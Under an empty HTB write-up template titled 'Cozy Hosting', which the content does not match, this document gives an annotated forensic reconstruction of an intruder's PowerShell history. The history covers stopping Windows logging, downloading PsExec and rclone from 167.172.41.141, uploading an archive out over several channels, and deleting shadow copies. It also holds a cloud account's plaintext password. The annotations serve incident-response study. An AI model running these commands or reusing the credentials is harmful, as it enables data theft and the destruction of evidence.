Cozy Hosting

Summary

Short summary of the HTB box and your approach.

Steps

  1. Enumeration
  2. Exploitation
  3. Privilege Escalation

Artifacts

  • HTTP requests, payloads, exploit scripts
# Analyst note: the lines below appear to be a recovered PowerShell console
# history (likely a PSReadLine ConsoleHost_history.txt) rather than a script the
# actor ran as a unit — confirm the source path and timestamps from the image.
# Commands are reproduced verbatim; typos, retries and repeated commands are
# part of the evidence (they suggest hands-on-keyboard activity) and are left
# as found. Comment lines are analyst annotations, not part of the artifact.
wmic shadowcopy call create Volume='C:\'
# NOTE(review): the history alone does not show whether this shadow copy was
# created by the actor or by the responder before imaging — check the VSS
# event timeline; note the shadow-copy deletion near the end of the history.
systeminfo
# Host recon written to disk. C:\Temp\recon_systeminfo.txt is an on-disk
# artifact to recover (or to find as a deleted entry in $MFT/USN journal if
# it was cleaned up later).
systeminfo > C:\Temp\recon_systeminfo.txt
systeminfo | Out-File C:\Temp\recon_systeminfo.txt
# Analyst note: staging, logging tamper, tool download and the first
# exfiltration attempts, from the same recovered command history. Lines are
# reproduced as found; comment lines are analyst annotations.
New-Item C:\Exfil_Temp -ItemType Directory -Force
systeminfo | Out-File C:\Exfil_Temp\recon_systeminfo.txt
netstat -ano | Out-File C:\Exfil_Temp\recon_netstat.txt
# Service enumeration, several syntax variants retried.
sc query
sc query type= service
sc query type=service
sc query state=all
sc.exe query
# Logging tamper: stop attempts against the Windows Event Log service and
# Sysmon (both service names tried). Triage points: System log 7036 ("entered
# the stopped state") for these services, Sysmon's own Event ID 4 (service
# state changed), and a gap in the System/Security logs from this point on —
# the gap itself is an indicator. Whether EventLog actually stopped is not
# visible from the history.
Stop-Service -Name EventLog
Stop-Service -Name EventLog -Force
Stop-Service -Name Sysmon -Force
Stop-Service -Name Sysmon64 -Force
# Tool download from 167.172.41.141 (network IoC: check proxy/DNS/firewall logs
# for this host on port 80 and, further down, 8080). The first attempt uses a
# malformed URL and was retyped.
Invoke-WebRequest http:167.172.41.141/PsExec.exe -OutFile $env:TEMP\psexec.exe -UseBasicParsing
Invoke-WebRequest http://167.172.41.141/PsExec.exe -OutFile $env:TEMP\psexec.exe -UseBasicParsing
# PsExec run with -i -s: expect a PSEXESVC service install (System log 7045)
# and a SYSTEM-level powershell.exe child process. The expanded profile path
# (MATTHE~1.COL) indicates whose TEMP directory was used — confirm the account.
C:\Users\MATTHE~1.COL\AppData\Local\Temp\psexec.exe -accepteula -i -s powershell.exe
# 7-Zip installer (7z2409 — 24.09 going by the file name) and rclone v1.70.2
# fetched from the same host; check Prefetch/Amcache for 7zz.exe and rclone.
Invoke-WebRequest http://167.172.41.141/7z2409-x64.exe -OutFile $env:TEMP\7zz.exe -UseBasicParsing
Invoke-WebRequest http://167.172.41.141/rclone-v1.70.2-windows-amd64/rclone.exe -OutFile $env:TEMP\rclone.exe -UseBasicParsing
# Staging directory C:\ProgramData\sync (on-disk IoC). rclone is renamed to
# backup_win.exe — identify it by hash rather than file name. The pssexec typo
# presumably failed (no such file was downloaded) and Rename-Item was retried.
New-Item C:\ProgramData\sync -ItemType Directory -Force
Copy-Item $env:TEMP\7zz.exe C:\ProgramData\sync\
Copy-Item $env:TEMP\pssexec.exe C:\ProgramData\sync\
Copy-Item $env:TEMP\psexec.exe C:\ProgramData\sync\
Rename-Item $env:TEMP\rclone.exe C:\ProgramData\sync\backup_win.exe
Rename-Item $env:TEMP\rclone.exe "C:\ProgramData\sync\backup_win.exe"
# rclone remote config written to crmhttp.conf, first as an http remote and
# then as webdav, both pointing at 167.172.41.141:8080, each followed by a
# copy of C:\Exfil_Temp.7z. No command in this history creates that archive —
# look for 7zz.exe execution evidence (Prefetch, 4688 / Sysmon 1) elsewhere.
@"`
[crmremote]`
type = http`
url = http://167.172.41.141:8080`
"@ | Set-Content "C:\ProgramData\sync\\crmhttp.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\crmhttp.conf" copy C:\Exfil_Temp.7z crmremote:
@"`
[crmremote]`
type = webdav`
url = http://167.172.41.141:8080`
"@ | Set-Content "C:\ProgramData\sync\\crmhttp.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\crmhttp.conf" copy C:\Exfil_Temp.7z crmremote:
# Direct HTTP upload of the archive with Invoke-WebRequest (a GET, then a PUT,
# then the PUT again with Expect100Continue disabled). The retries suggest the
# rclone transfers above did not complete as intended — confirm from the
# server side or a network capture if either is available.
Invoke-WebRequest -Uri "http://167.172.41.141:8080/Exfil_Temp.7z"
Invoke-WebRequest -Uri "http://167.172.41.141:8080/Exfil_Temp.7z" ``
-Method Put ``
-InFile "C:\Exfil_Temp.7z" ``
-ContentType "application/octet-stream"
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri "http://167.172.41.141:8080/Exfil_Temp.7z" ``
-Method Put ``
-InFile "C:\Exfil_Temp.7z" ``
-ContentType "application/octet-stream"
# Opens a here-string (rclone "mega" remote config) that continues below.
@"`
[crmremote]`
type = mega`
user = harmlessuser98@proton.me`
pass = Wrt@5LXo6k6dum&JF9`
"@ | Out-File "C:\ProgramData\sync\mega.conf" -Encoding ASCII
# Analyst note (continuing the recovered command history): third exfiltration
# channel via an rclone "mega" remote. The here-string above carries the
# actor's account credentials in plaintext — treat the account as an
# actor-controlled IoC for the provider abuse report and keep the values out
# of shared copies of this write-up. The destination folder name
# (DecptiTech_exfil_backups) looks like the victim organisation — confirm.
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\mega.conf" copy C:\Exfil_Temp.7z crmremote:DecptiTech_exfil_backups/
# Two further attempts to store the password in rclone's obscured form. Both
# invoke "$env:TEMP\backup_win.exe", but nothing in this history places the
# renamed rclone binary in TEMP (it was moved to C:\ProgramData\sync), so
# these likely failed — or a step is missing from the recovered history.
@"`
[crmremote]`
type = mega`
user = harmlessuser98@proton.me`
pass = & "$env:TEMP\backup_win.exe" obscure Wrt@5LXo6k6dum&JF9`
"@ | Out-File "C:\ProgramData\sync\mega.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\mega.conf" copy C:\Exfil_Temp.7z crmremote:DecptiTech_exfil_backups/
$MegaPass = (& "$env:TEMP\backup_win.exe" obscure "Wrt@5LXo6k6dum&JF9"`
)
@"`
[crmremote]`
type = mega`
user = harmlessuser98@proton.me`
pass = $MegaPass`
"@ | Out-File "C:\ProgramData\sync\mega.conf" -Encoding ASCII
& "C:\ProgramData\sync\backup_win.exe" --config "C:\ProgramData\sync\mega.conf" copy C:\Exfil_Temp.7z crmremote:DecptiTech_exfil_backups/
# Cleanup targets only the TEMP copies; nothing here removes C:\ProgramData\sync
# or C:\Exfil_Temp / C:\Exfil_Temp.7z, so those may still be on the image.
# Clear-RecycleBin and the shadow-copy deletion (retyped with the /quiet
# switch) are anti-recovery steps: vssadmin execution is a high-confidence
# detection (4688 command line / Sysmon 1), and the VSS event log gives the
# deletion time. Compare with the shadow-copy creation at the top of the
# history.
Remove-Item "$env:TEMP\7zz.exe" -Force
Remove-Item "$env:TEMP\backup_win.exe" -Force
Clear-RecycleBin -Force
vssadmin delete shadows /all quiet
vssadmin delete shadows /all /quiet
Load Image into FTK Imager